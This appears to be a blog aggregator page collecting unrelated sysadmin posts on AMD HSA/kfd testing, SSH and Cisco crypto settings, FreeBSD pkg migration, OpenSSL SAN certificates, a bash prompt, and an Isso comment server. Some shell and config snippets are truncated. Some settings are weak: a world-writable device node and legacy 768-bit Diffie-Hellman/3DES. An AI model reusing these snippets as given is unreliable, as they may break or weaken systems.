[    1.657248] kfd kfd: Initialized module
[    1.657254] Found CRAT image with size=1440
[    1.657257] Parsing CRAT table with 1 nodes
[    1.657258] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657260] CU CPU: cores=4 id_base=16
[    1.657261] Found CU entry in CRAT table with proximity_domain=0 caps=0
[    1.657262] CU GPU: simds=32 id_base=-2147483648
[    1.657263] Found memory entry in CRAT table with proximity_domain=0
[    1.657264] Found memory entry in CRAT table with proximity_domain=0
[    1.657265] Found memory entry in CRAT table with proximity_domain=0
[    1.657266] Found memory entry in CRAT table with proximity_domain=0
[    1.657267] Found cache entry in CRAT table with processor_id=16
[    1.657268] Found cache entry in CRAT table with processor_id=16
[    1.657269] Found cache entry in CRAT table with processor_id=16
[    1.657270] Found cache entry in CRAT table with processor_id=17
[    1.657271] Found cache entry in CRAT table with processor_id=18
[    1.657272] Found cache entry in CRAT table with processor_id=18
[    1.657273] Found cache entry in CRAT table with processor_id=18
[    1.657274] Found cache entry in CRAT table with processor_id=19
[    1.657274] Found TLB entry in CRAT table (not processing)
[    1.657275] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657276] Found TLB entry in CRAT table (not processing)
[    1.657277] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657278] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657279] Found TLB entry in CRAT table (not processing)
[    1.657280] Found TLB entry in CRAT table (not processing)
[    1.657286] Creating topology SYSFS entries
[    1.657316] Finished initializing topology ret=0
[    1.663173] [drm] initializing kernel modesetting (KAVERI 0x1002:0x1313 0x1002:0x0123).
[    1.663204] [drm] register mmio base: 0xFEB00000
[    1.663206] [drm] register mmio size: 262144
[    1.663210] [drm] doorbell mmio base: 0xD0000000
[    1.663211] [drm] doorbell mmio size: 8388608
[    1.663280] ATOM BIOS: 113
[    1.663357] radeon 0000:00:01.0: VRAM: 1024M 0x0000000000000000 - 0x000000003FFFFFFF (1024M used)
[    1.663359] radeon 0000:00:01.0: GTT: 1024M 0x0000000040000000 - 0x000000007FFFFFFF
[    1.663360] [drm] Detected VRAM RAM=1024M, BAR=256M
[    1.663361] [drm] RAM width 128bits DDR
[    1.663471] [TTM] Zone  kernel: Available graphics memory: 7671900 kiB
[    1.663472] [TTM] Zone   dma32: Available graphics memory: 2097152 kiB
[    1.663473] [TTM] Initializing pool allocator
[    1.663477] [TTM] Initializing DMA pool allocator
[    1.663496] [drm] radeon: 1024M of VRAM memory ready
[    1.663497] [drm] radeon: 1024M of GTT memory ready.
[    1.663516] [drm] Loading KAVERI Microcode
[    1.667303] [drm] Internal thermal controller without fan control
[    1.668401] [drm] radeon: dpm initialized
[    1.669403] [drm] GART: num cpu pages 262144, num gpu pages 262144
[    1.685757] [drm] PCIE GART of 1024M enabled (table at 0x0000000000277000).
[    1.685894] radeon 0000:00:01.0: WB enabled
[    1.685905] radeon 0000:00:01.0: fence driver on ring 0 use gpu addr 0x0000000040000c00 and cpu addr 0xffff880429c5bc00
[    1.685908] radeon 0000:00:01.0: fence driver on ring 1 use gpu addr 0x0000000040000c04 and cpu addr 0xffff880429c5bc04
[    1.685910] radeon 0000:00:01.0: fence driver on ring 2 use gpu addr 0x0000000040000c08 and cpu addr 0xffff880429c5bc08
[    1.685912] radeon 0000:00:01.0: fence driver on ring 3 use gpu addr 0x0000000040000c0c and cpu addr 0xffff880429c5bc0c
[    1.685914] radeon 0000:00:01.0: fence driver on ring 4 use gpu addr 0x0000000040000c10 and cpu addr 0xffff880429c5bc10
[    1.686373] radeon 0000:00:01.0: fence driver on ring 5 use gpu addr 0x0000000000076c98 and cpu addr 0xffffc90012236c98
[    1.686375] [drm] Supports vblank timestamp caching Rev 2 (21.10.2013).
[    1.686376] [drm] Driver supports precise vblank timestamp query.
[    1.686406] radeon 0000:00:01.0: irq 83 for MSI/MSI-X
[    1.686418] radeon 0000:00:01.0: radeon: using MSI.
[    1.686441] [drm] radeon: irq initialized.
[    1.689611] [drm] ring test on 0 succeeded in 3 usecs
[    1.689699] [drm] ring test on 1 succeeded in 2 usecs
[    1.689712] [drm] ring test on 2 succeeded in 2 usecs
[    1.689849] [drm] ring test on 3 succeeded in 2 usecs
[    1.689856] [drm] ring test on 4 succeeded in 2 usecs
[    1.711523] tsc: Refined TSC clocksource calibration: 3393.828 MHz
[    1.746010] [drm] ring test on 5 succeeded in 1 usecs
[    1.766115] [drm] UVD initialized successfully.
[    1.767829] [drm] ib test on ring 0 succeeded in 0 usecs
[    2.268252] [drm] ib test on ring 1 succeeded in 0 usecs
[    2.712891] Switched to clocksource tsc
[    2.768698] [drm] ib test on ring 2 succeeded in 0 usecs
[    2.768819] [drm] ib test on ring 3 succeeded in 0 usecs
[    2.768870] [drm] ib test on ring 4 succeeded in 0 usecs
[    2.791599] [drm] ib test on ring 5 succeeded
[    2.812675] [drm] Radeon Display Connectors
[    2.812677] [drm] Connector 0:
[    2.812679] [drm]   DVI-D-1
[    2.812680] [drm]   HPD3
[    2.812682] [drm]   DDC: 0x6550 0x6550 0x6554 0x6554 0x6558 0x6558 0x655c 0x655c
[    2.812683] [drm]   Encoders:
[    2.812684] [drm]     DFP2: INTERNAL_UNIPHY2
[    2.812685] [drm] Connector 1:
[    2.812686] [drm]   HDMI-A-1
[    2.812687] [drm]   HPD1
[    2.812688] [drm]   DDC: 0x6530 0x6530 0x6534 0x6534 0x6538 0x6538 0x653c 0x653c
[    2.812689] [drm]   Encoders:
[    2.812690] [drm]     DFP1: INTERNAL_UNIPHY
[    2.812691] [drm] Connector 2:
[    2.812692] [drm]   VGA-1
[    2.812693] [drm]   HPD2
[    2.812695] [drm]   DDC: 0x6540 0x6540 0x6544 0x6544 0x6548 0x6548 0x654c 0x654c
[    2.812695] [drm]   Encoders:
[    2.812696] [drm]     CRT1: INTERNAL_UNIPHY3
[    2.812697] [drm]     CRT1: NUTMEG
[    2.924144] [drm] fb mappable at 0xC1488000
[    2.924147] [drm] vram apper at 0xC0000000
[    2.924149] [drm] size 9216000
[    2.924150] [drm] fb depth is 24
[    2.924151] [drm]    pitch is 7680
[    2.924428] fbcon: radeondrmfb (fb0) is primary device
[    2.994293] Console: switching to colour frame buffer device 240x75
[    2.999979] radeon 0000:00:01.0: fb0: radeondrmfb frame buffer device
[    2.999981] radeon 0000:00:01.0: registered panic notifier
[    3.008270] ACPI Error: [\_SB_.ALIB] Namespace lookup failure, AE_NOT_FOUND (20131218/psargs-359)
[    3.008275] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATC0] (Node ffff88042f04f028), AE_NOT_FOUND (20131218/psparse-536)
[    3.008282] ACPI Error: Method parse/execution failed [\_SB_.PCI0.VGA_.ATCS] (Node ffff88042f04f000), AE_NOT_FOUND (20131218/psparse-536)
[    3.509149] kfd: kernel_queue sync_with_hw timeout expired 500
[    3.509151] kfd: wptr: 8 rptr: 0
[    3.509243] kfd kfd: added device (1002:1313)
[    3.509248] [drm] Initialized radeon 2.37.0 20080528 for 0000:00:01.0 on minor 0
It is recommended to add udev rules:
# cat /etc/udev/rules.d/kfd.rules 
KERNEL=="kfd", MODE="0666"
(this might not be the best way to do it, but we're just here to test if things work at all ...)

AMD has provided a small shell script to test if things work:
# ./ 

Kaveri detected:............................Yes
Kaveri type supported:......................Yes
Radeon module is loaded:....................Yes
KFD module is loaded:.......................Yes
AMD IOMMU V2 module is loaded:..............Yes
KFD device exists:..........................Yes
KFD device has correct permissions:.........Yes
Valid GPU ID is detected:...................Yes

Can run HSA.................................YES
So that's a good start. Then you need some support libs ... which I've ebuildized in the most horrible ways
These ebuilds can be found here

Since there's at least one binary file with undeclared license and some other inconsistencies I cannot recommend installing these packages right now.
And of course I hope that AMD will release the sourcecode of these libraries ...

There's an example "vector_copy" program included, it mostly works, but appears to go into an infinite loop. Outout looks like this:
# ./vector_copy 
Initializing the hsa runtime succeeded.
Calling hsa_iterate_agents succeeded.
Checking if the GPU device is non-zero succeeded.
Querying the device name succeeded.
The device name is Spectre.
Querying the device maximum queue size succeeded.
The maximum queue size is 131072.
Creating the queue succeeded.
Creating the brig module from vector_copy.brig succeeded.
Creating the hsa program succeeded.
Adding the brig module to the program succeeded.
Finding the symbol offset for the kernel succeeded.
Finalizing the program succeeded.
Querying the kernel descriptor address succeeded.
Creating a HSA signal succeeded.
Registering argument memory for input parameter succeeded.
Registering argument memory for output parameter succeeded.
Finding a kernarg memory region succeeded.
Allocating kernel argument memory buffer succeeded.
Registering the argument buffer succeeded.
Dispatching the kernel succeeded.
Big thanks to AMD for giving us geeks some new toys to work with, and I hope it becomes a reliable and efficient platform to do some epic numbercrunching :)

Spieglein, Spieglein My Universe | 2014-09-02 18:03 UTC

Mit dem letzten Update der Pacman Mirrorlist wurde mein Arch Linux Spiegelserver als offizieller Tier 2 Mirror mit aufgenommen. Der Spiegel ist zu erreichen unter und bietet neben HTTP und HTTPS auch rsync-Unterstützung und ist sowohl über IPv4 als auch über IPv6 zu erreichen.

Beim letzten Beitrag zur SSH-Konfiguration unter Cisco IOS und Cisco ASA fiel mir noch ein, dass man über sinnvolle Anpassungen der Client-Konfiguration auch mal schreiben sollte. Zumindest unter MacOS (und mindestens auch unter Debian und älterem Ubuntu Linux) wird standardmäßig nicht immer die optimale Kryptographie verwendet.
Die SSH-Parameter können an zwei Stellen konfiguriert werden:

  • systemweit unter /etc/ssh_config
  • per User unter ~/.ssh/config
In der systemweiten SSH-Config befinden sich z.B. die folgenden drei Zeilen, die weite Teile der verwendeten Kryptographie bestimmen (genauer gesagt zeigen sie die Defaults):

#Ciphers aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour
#KexAlgorithms ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
#MACs hmac-md5,hmac-sha1,,hmac-ripemd160,hmac-sha1-96,hmac-md5-96,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96
Was kann/sollte man ändern:


Wer keine legacy Systeme zu pflegen hat, der könnte alle nicht-AES ciphers entfernen. Aber Geräte wie 2950 Switche sind halt auch noch ab und an anzutreffen. Daher muss man in so einem Fall 3des-cbc auch konfiguriert haben. Die Cipher-Zeile könnte dann folgendermaßen aussehen:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc,3des-cbc
Laut Manpage (und basierend auf der unter Mavericks verwendeten OpenSSH-Version 6.2) sollten zwar auch die moderneren GCM-Typen unterstützt sein. Wenn die konfiguriert sind, meldet der SSH-Client aber „Bad SSH2 cipher spec“.
Beim Zugriff auf Cisco Router und Switche kommen typischerweise die CBC-Versionen zum Einsatz, da CTR erst ab IOS 15.4 unterstützt ist.

Hier wird der Key-Exchange gesteuert. Meine Konfig-Zeile auf dem Mac ist die folgende:

KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
Die ElipticCurve Algorithmen habe ich entfernt, da diese im Verdacht stehen Backdoors zu beinhalten. Die vermutlich vertrauenswürdige curve25519 von D.J. Bernstein ist erst in OpenSSH 6.6p1 enthalten. Diese werde ich bei Verfügbarkeit mit aufnehmen. Als letztes in der Zeile ist weiterhin ein Group1-Exchange (768 Bit), der für Legacy-Geräte benötigt wird.

Am meisten stört mich, dass eine MD5-Methode die höchste Priorität hat, gefolgt von einer SHA1-Methode. Da sollte die Reihenfolge angepasst werden:

Interessant sind die etm-MACs. Dazu ein kleiner Ausflug in Message Authentication Codes. Die Protokolle SSL, IPsec und SSH verwenden standardmäßig verschiedene Methoden um die Daten zu verschlüsseln und die Integrität zu sichern:

  • SSL: mac-then encrypt. Dabei wird erst der MAC gebildet, dann werden Daten und MAC verschlüsselt.
  • IPsec: encrypt-then-mac. Dabei werden die Daten erst verschlüsselt und dann darüber der MAC gebildet.
  • SSH: encyrpt-and-mac. Die Daten werden verschlüsselt, die MAC wird aber über die Klartextdaten gebildet.
Es hat sich herausgestellt, dass von diesen drei Optionen die von IPsec verwendete Methode die sicherste ist. Diese encrypt-then-mac (etm) Verfahren können auch bei SSH verwendet werden.

Was hat sich jetzt beim Zugriff auf ein IOS-Gerät geändert? Ohne diese Anpassungen sieht die SSH-Session so aus (auf einem Cisco 3560 mit IOS 15.0(2)SE5):

c3560#sh ssh
Connection Version Mode Encryption  Hmac	 State	            Username
1          2.0     IN   aes128-cbc  hmac-md5     Session started   ki
1          2.0     OUT  aes128-cbc  hmac-md5     Session started   ki
Es wird aes-128-cbc mit einem MD5-HMAC verwendet. Nach den Änderungen ist die Krypto etwas besser (im Rahmen der Möglichkeiten des IOS):

c3560#sh ssh
Connection Version Mode Encryption  Hmac	 State	           Username
0          2.0     IN   aes256-cbc  hmac-sha1    Session started   ki
0          2.0     OUT  aes256-cbc  hmac-sha1    Session started   ki
Hier noch einmal die resultierende ~/.ssh/config:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc,3des-cbc
KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
Nach einigem Nachdenken kam ich zu dem Ergebnis, dass mir die Aufnahme der Legacy-Verfahren in die Config-Datei irgendwie nicht gefällt. Daher habe ich diese wieder rausgeschmissen und gebe bei der Verbindung zu älteren Geräten die benötigte Crypto direkt an. Hier ein Beispiel für den Zugriff auf einen 2950:

ssh -l ki -o Ciphers="3des-cbc" -o KexAlgorithms="diffie-hellman-group1-sha1"
Und hier die angepasste ~/.ssh/config:

Ciphers aes256-ctr,aes128-ctr,aes256-cbc,aes128-cbc
KexAlgorithms diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha1,diffie-hellman-group-exchange-sha1
Weitergehende Verbesserungsvorschläge werden gerne angenommen.

The ports tree has been modified to only support pkg(8) as package management system for all supported version of FreeBSD.

if you were still using pkg_install (pkg_* tools) you will have to upgrade your system.

The simplest way is

cd /usr/ports/ports-mgmt/pkg
make install

then run


You will have lots of warning, don’t be scared, they are expected, pkg_*  databases used to get easily mangled. pkg2ng is most of the time able to deal
with it.

If however you encounter a problem then please report to

A tag has been applied to the ports tree if you need to get the latest ports tree before the EOL of pkg_install:

A branch has been created if some committers want to provides updates on the for pkg_install users:

Please note that this branch is not officially maintained and that we strongly recommend that you do migrate to pkg(8)

The ports tree is now fully staged (only 2% has been left unstaged, marked as broken and will be removed from the ports tree if no PR to stage them are pending in bugzilla).

I would like to thank every committer and maintainers for their work on staging!
It allowed us to convert more than 23k packages to support stage in only 11 months!

Staging is a very important state, it allows us to right now be able to run quality testing scripts on the packages (which already allowed to fix tons of hidden problems) and it allows use to be able to build packages as a regular user!

It also opens the gates to new features that users have been requesting for many years:

  • flavors
  • multiple packages
Expect those features to happen in the near future.

Ab und zu erschrecke ich doch was Cisco-Mitarbeiter so verzapfen. Jetzt hat gerade einer in der Cisco Support-Community ein Dokument zur Konfiguration von SSH auf der ASA veröffentlicht. Und da liest man z.B., dass die Keysize von 1024 Bit benutzen werden soll. Und nichts weiter zu heutigen “Best Practices” der SSH-Konfig. Grund genug eine in meinen Augen “anständige” SSH-Konfig für IOS-Geräte und die ASA zu zeigen:

Cisco IOS
Es geht damit los, ein RSA-Keypair zu generieren, das nur für den SSH-Prozess verwendet wird. Dafür wird dem Keypair ein Label mitgegeben:

crypto key generate rsa label SSH-KEY modulus 4096
Etwas Gedanken sollte man sich über die Keylänge machen. Länger bedeutet zum einen sicherer, aber auch langsamer. Allerdings nicht so langsam, dass es nicht benutzbar wäre. Damit ist die Entscheidung recht einfach. Allgemeine Hinweise zu minimalen Keylängen findet man u.a. auf

Das RSA-Keypair wird der SSH-Konfig zugewiesen:

ip ssh rsa keypair-name SSH-KEY
Nur SSHv2 erlauben:

ip ssh version 2
Beim Verbindungsaufbau werden die Session-Keys per Diffie-Hellman erzeugt. Das ist standardmäßig mit der Gruppe 1 (768 Bit) erlaubt, was nicht mehr state-of-the-art ist. Daher wird eine höhere DH-Gruppe konfiguriert. Jetzt ist es aber so, dass die aktuelle Version (0.63) von Putty mit einem 4096 Bit Key-Exchange nicht klar kommt. Sowohl mit SecureCRT, als auch mit dem eingebauten SSH von Mac OS und Linux klappt es aber. Wer per Putty administrieren will, sollte hier also nur 2048 verwenden, was natürlich auch sehr sicher ist.

ip ssh dh min size 4096
Login-Vorgänge sollten protokolliert werden:

ip ssh logging events
Als letztes wird auf der VTY-Line nur SSH erlaubt. Telnet ist damit abgeschaltet.

line vty 0 4
  transport input ssh
Was könnte man sonst noch für SSH konfigurieren: Ab und an kommt der Wunsch auf, für SSH nicht den Port TCP/22 zu verwenden. Das erhöht zwar nicht unbedingt die Sicherheit, sorgt aber dafür, dass die Logs etwas kleiner bleiben wenn SSH vom Internet aus erreichbar ist:

ip ssh port 7890 rotary 1
line vty 0 4
  rotary 1
Wenn der Zugriff über ein Interface erfolgt, auf dem eine eingehende ACL konfiguriert ist, dann muss in dieser die Kommunikation natürlich auch erlaubt werden.

Weitere Schutzmechanismen über die nachgedacht werden können sind Control-Plane-Protection und Management-Plane-Protection wenn out-of-band Management verwendet wird. Wenn der SSH-Zugriff nicht von “any” benötigt wird, dann sollte für die Lines natürlich auch eine Access-Class konfiguriert werden. Aber auch das ist nicht SSH-spezifisch.

Cisco ASA
Für die ASA gilt so ziemlich das oben genannte, nur das die SSH-Konfiguration nicht so umfangreich angepasst werden kann. Weiterhin ist die Syntax teilweise anders:

crypto key generate rsa modulus 4096
ssh version 2
ssh key-exchange group dh-group14-sha1
Die Key-Länge ist hier auch von der Plattform abhängig. Die Legacy-ASAs unterstützen keine Keys mit mehr als 2048 Bit. Auf den aktuellen -X-Geräten kann aber auch 4096 Bit genutzt werden.

Auch muss der SSH-Zugriff auf der ASA explizit für die Management-IPs erlaubt werden:

ssh inside
ssh outside

Ausgemistet My Universe | 2014-08-31 21:19 UTC

Den heutigen Tag habe ich dazu genutzt, um mein Portfolio an angearbeiteten Projekten zu überprüfen und aufzuräumen. Insbesondere von Projekten aus meiner wilden C-Zeit habe ich mich nun getrennt — kein Verlust, wenn man bedenkt, dass dieses Zeugs seit Jahren keine Pflege mehr gesehen hat. Und dringend notwendig, wenn man bedenkt, dass Familie, Haus, Garten und Beruf ebenfalls ihren Tribut fordern.

Übrig geblieben ist eine überschaubare Liste mit Projekten, an denen ich — wenn auch wohl eher sporadisch — weiterarbeiten werde:


Magrathea ist ein im Entstehen begriffener Rewrite des doch mittlerweile sehr in die Jahre gekommenen Planet Planet. Die Motivation für das Projekt lag und liegt klar in der Ablösung von Planet Planet für den Planeten. Ein großes Stück der Funktionalität ist seit meinem eigenen Summer of Code (sprich: Dänemark-Urlaub) bereits fertig implementiert; zur Fertigstellung fehlen aber noch mal ein paar Wochenenden.

Wenn alles glatt läuft, könnte Magrathea aber bis zum Spätherbst eine erste Beta-Version haben, bis Weihnachten vielleicht sogar ein erstes Release. Damit fällt es bei mir eher in die Kategorie der kurzfristigen Projekte.

Beastie's Fortress

Bei Beastie's Fortress handelt es sich um ein Online-Buchprojekt. Aus den letzten Jahren haben sich eine Menge Installationsmitschriften für Unix-Server angesammelt; da lag die Idee nahe, diese einmal in einem „Best Of“ zusammenzufassen. Ein Teil der Texte liegt bereits als reStructuredText vor, taugt aber noch lange nicht zur Veröffentlichung.

Dieses Projekt hat den unschätzbaren Vorteil, dass es nicht zwangsläufig komplett fertig gestellt sein muss — auch einzelne Kapitel lassen sich veröffentlichen, ohne dass das gesamte Buch druckreif vorliegen muss. Beastie's Fortress wird also eher ein lückenfüllendes Begleitprojekt, an dem ich bei Lust, Laune (und Langeweile) weiterarbeiten werde.


Stormrose existiert bis jetzt nur als Idee in meinem Kopf. In der Vergangenheit hatte ich schon mehrfach Anläufe unternommen, ein komfortables Remote Management Werkzeug für Unix-Server zu entwickeln. Bis jetzt hatte ich jedoch nicht das Gefühl, dass diese Ansätze tatsächlich die Arbeit als Admin vereinfachten. An den konzeptionellen Überlegungen habe ich nach wie vor viel Spaß; vielleicht entsteht also langfristig daraus tatsächlich ein Stück Software — vielleicht überlebt sich das Projekt aber auch von selbst, wenn die Cloud auch den letzten von uns geholt hat.

If you do daily management on Unix/Linux systems, then checking the return code of a command is something you’ll do often. If you do SELinux development, you might not even notice that a command has failed without checking its return code, as policies might prevent the application from showing any output.

To make sure I don’t miss out on application failures, I wanted to add the return code of the last executed command to my PS1 (i.e. the prompt displayed on my terminal).
I wasn’t able to add it to the prompt easily – in fact, I had to use a bash feature called the prompt command.

When the PROMPT_COMMMAND variable is defined, then bash will execute its content (which I declare as a function) to generate the prompt. Inside the function, I obtain the return code of the last command ($?) and then add it to the PS1 variable. This results in the following code snippet inside my ~/.bashrc:

export PROMPT_COMMAND=__gen_ps1
function __gen_ps1() {
  local EXITCODE="$?";
  # Enable colors for ls, etc.  Prefer ~/.dir_colors #64489
  if type -P dircolors >/dev/null ; then
    if [[ -f ~/.dir_colors ]] ; then
      eval $(dircolors -b ~/.dir_colors)
    elif [[ -f /etc/DIR_COLORS ]] ; then
      eval $(dircolors -b /etc/DIR_COLORS)
  if [[ ${EUID} == 0 ]] ; then
    PS1="RC=${EXITCODE} \[\033[01;31m\]\h\[\033[01;34m\] \W \$\[\033[00m\] "
    PS1="RC=${EXITCODE} \[\033[01;32m\]\u@\h\[\033[01;34m\] \w \$\[\033[00m\] "
With it, my prompt now nicely shows the return code of the last executed command. Neat.

Edit: Sean Patrick Santos showed me my utter failure in that this can be accomplished with the PS1 variable immediately, without using the overhead of the PROMPT_COMMAND. Just make sure to properly escape the $ sign which I of course forgot in my late-night experiments :-(.

Multi-Domain Zertifikate My Universe | 2014-08-30 20:51 UTC

In Zeiten knapper IPv4-Adressen werden Multi-Domain Zertifikate immer bedeutsamer — mit ihrer Hilfe wird es möglich, virtuelle HTTPS-Hosts mit unterschiedlichen Hostnamen unter derselben IP-Adresse zu betrieben. Das war lange Zeit nicht möglich, da SSL und TLS bereits beim Verbindungsaufbau das Zertifikat austauschen und verifizieren — also lange bevor der Host-Header auf Ebene des HTTP-Protokolls übermittelt wurde.

Subject Alternative Names (kurz: SAN) lösen dieses Problem, indem sie einfach anstelle eines einzelnen Common Name beliebig viele alternative Namen in ein Zertifikat einbetten. Um ein SAN-basiertes Zertifikat zu erstellen, muss ein passender Request generiert werden — dieser Schritt ist der einzige Stolperstein bei der Erstellung von SAN-Zertifikaten. Hier wird Schritt für Schritt erklärt, wie man mit Hilfe von OpenSSL einen entsprechenden Certificate Signing Request (CSR) erstellt.

Zunächst benötigt man eine Liste mit Domains, die in das Zertifikat mit aufgenommen werden sollen. Diese Datei bekommt den Namen domains.txt:
Sodann benötigen wir eine Vorlage für eine angepasste openssl.cnf Datei. Dazu nutzen wir die Standard-Konfiguration, die von OpenSSL mitgeliefert wird:

mkdir ~/cacert  
cd ~/cacert  
head -$(( $(grep -n '\[ v3_ca \]' /etc/ssl/openssl.cnf | sed 's/:.*$//g') - 1)) /etc/ssl/openssl.cnf > openssl.cnf.part1  
echo >> openssl.cnf.part1 << EOF  
subjectAltName = @alt_names

tail -$(( $(wc -l /etc/ssl/openssl.cnf | sed 's/[[:space:]].*//g') - $(grep -n '\[ v3_ca \]' /etc/ssl/openssl.cnf | sed 's/:.*$//g') + 1 )) /etc/ssl/openssl.cnf > openssl.cnf.part2  
Beide Vorlagenteile sollten nun manuell überprüft und ggf. angepasst werden. Hier eine Zusammenfassung der wichtigsten Änderungen (alle vorzunehmen in openssl.cnf.part1):

[ CA_default ]
dir = .

[ req ]
default_bits    = 8192  
default_keyfile = key.pem  
req_extensions  = v3_req

[ req_distinguished_name ]
countryName_default = DE  
Um die Erstellung eines CSR möglichst weit zu automatisieren (bei langen Listen mit Domain-Namen eine lohnende Sache) benötigen wir noch ein kleines Shell-Skript, abgespeichert als


if [ -f "openssl.cnf" ]; then  
    cp openssl.cnf openssl-$(date '+%Y%m%d-%H%M%S').cnf
cp openssl.cnf.part1 openssl.cnf

while read LINE; do  
    echo "DNS.${i} = ${LINE}" >> openssl.cnf
    echo "DNS.${i} = *.${LINE}" >> openssl.cnf
done < domains.txt  
echo >> openssl.cnf  
cat openssl.cnf.part2 >> openssl.cnf

openssl req -new -out req-$(date '+%Y%m%d-%H%M%S').pem -key key.pem -config openssl.cnf  
Bevor wir nun einen CSR erstellen können, benötigen wir noch einen privaten Schlüssel:

openssl genrsa -out key.pem 4096  
Ein CSR lässt sich nun ganz einfach mit dem Shell-Skript erstellen:

Der neu erzeugte CSR liegt nun in der Datei req-<datum>-<uhrzeit>.pem und kann einer Zertifizierungstelle (CA) wie etwa CAcert zur Signierung vorgelegt werden. Alternativ kann man den Request natürlich auch selbst signieren; dafür benötigt man aber ein bisschen Infrastruktur — deren Aufbau zu erklären würde jedoch den Rahmen dieses Postings sprengen.

Yesterday I fixed a PowerPC issue since ages, it is an endianess issue, and it is (funny enough) on the little endian flavour of it.


I have some ties with this architecture since my interest on the architecture (and Altivec/VMX in particular) is what made me start contributing to MPlayer while fixing issue on Gentoo and from there hack on the FFmpeg of the time, meet the VLC people, decide to part ways with Michael Niedermayer and with the other main contributors of FFmpeg create Libav. Quite a loong way back in the time.

Big endian, Little Endian

It is a bit surprising that IBM decided to use little endian (since big endian is MUCH nicer for I/O processing such as networking) but they might have their reasons.

PowerPC traditionally always had been both-endian with the ability to switch on the fly between the two (this made having foreign-endian simulators lightly less annoying to manage), but the main endianess had always been big.

This brings us to a quite interesting problem: Some if not most of the PowerPC code had been written thinking in big-endian. Luckily since most of the code wrote was using C intrinsics (Bless to whoever made the Altivec intrinsics not as terrible as the other ones around) it won’t be that hard to recycle most of the code.

More will follow.

Private Kommentare My Universe | 2014-08-30 06:57 UTC

Der Siegeszug von Disqus scheint nicht aufzuhalten zu sein, obwohl es eine ganze Reihe datenschutztechnischer Bedenken gibt — schließlich ist Disqus technisch gesehen nichts weiter als ein Webbug, der ähnlich den Facebook Webbugs auch dann Tracking-Daten an die Disqus-Server sendet, wenn man gar nicht bei Disqus registriert oder angemeldet ist. Selbst Udo Vetter hat seinen Lawblog jetzt verwanzt — für alle jene, die zum Schutz der eigenen Privatsphäre Ghostery einsetzen, sehen Kommentare dort so aus:

Aus Sicht eines Website-Betreibers kann ich diesen Trend sogar in gewisser Weise nachvollziehen: Trotz mehr oder minder starker Bemühungen seitens der Entwickler bieten die eingebauten Kommentarfunktionen von Wordpress, Drupal, Serendipity & Co nicht dieselbe Funktionalität wie Disqus, und neuere Systeme wie das von mir eingesetzte Ghost verzichten zugunsten externer Kommentardienste gleich ganz auf die Implementierung einer eigenen Kommentarfunktion.

Um es gleich vorweg zu nehmen: Einen gleichwertigen Ersatz zu Disqus kann auch ich nicht aus dem Ärmel schütteln. Wer jedoch dieses Blog verfolgt, wird schon festgestellt haben, dass auch hier das Kommentieren von Postings möglich ist. Im Hintergrund werkelt dafür eine von mir selbst betriebene Isso Installation. Deren Setup ist allerdings nicht ganz trivial, deshalb habe ich hier das grobe Vorgehen einmal festgehalten.

Isso wird hier so aufgesetzt, dass es für mehrere verschiedene Websites arbeitet, die jeweils wiederum unter mehreren verschiedenen URIs erreichbar sind (z. B. via HTTP und HTTPS). Für den Unterbau kommt uWSGI zum Einsatz. Leider lässt sich Isso selbst unter FreeBSD nicht aus den Ports installieren, sondern muss via pip direkt installiert werden. Wer in einem eigenen Jail unterwegs ist, kann das bedenkenlos tun — ansonsten bitte unbedingt virtualenv verwenden!

pkg ins uwsgi py27-pip py27-sqlite3  
pip install isso  
mkdir -p /usr/local/www/isso  
mkdir -p /usr/local/www/uwsgi  
mkdir -p /usr/local/etc/isso  
mkdir -p /var/log/isso  
touch /var/log/isso/uwsgi.log  
touch /var/log/isso/isso.log  
chown www:www /var/log/isso/isso.log  
chgrp www /usr/local/www/isso  
chgrp www /usr/local/www/uwsgi  
chmod 0770 /usr/local/www/isso  
chmod 0770 /usr/local/www/uwsgi  
Damit stehen nun alle benötigten Programme und Verzeichnisse zur Verfügung. Nun lassen sich einzelne Websites für Isso einfach konfigurieren, indem eine passende .ini Datei unter /usr/local/etc/isso/ abgelegt wird:

name = dummy  
dbpath = /usr/local/www/isso/dummy.db  
host =
Der Parameter name wird hier nur gesetzt, um die Isso-Installation fit für den Einsatz auf mehreren unterschiedlichen Websites zu machen. Isso stellt dann seine API unter name-spezifischen URIs zur Verfügung, etwa<name>/ (siehe auch hier). Beispiele für komplexere Konfigurationen z. B. mit Email-Benachrichtigung und Moderation finden sich übrigens in Issos Dokumentation.

Nun fehlt nur noch eine passende Konfiguration von uWSGI. Diese wird unter /usr/local/etc/uwsgi.ini abgespeichert und sieht in etwa so aus:

http =  
master = true  
processes = 4  
cache2 = name=hash,items=1024,blocksize=32  
spooler = /usr/local/www/uwsgi  
module = isso.dispatch  
env = ISSO_SETTINGS=/usr/local/etc/isso/dummy.ini;/usr/local/etc/isso/ghost.ini  
logto = /var/log/isso/uwsgi.log  
logto2 = /var/log/isso/isso.log  
Für ISSO_SETTINGS wird eine Liste tatsächlich existierender Konfigurationsdateien übergeben — diese Zeile also unbedingt an die eigenen Gegebenheiten anpassen!

Um Isso über uWSGI starten zu können, muss uWSGI noch in die rc.conf eingetragen werden:

cat >> /etc/rc.conf << EOF  
uwsgi_flags="-M /usr/local/etc/uwsgi.ini"  

service uwsgi start  
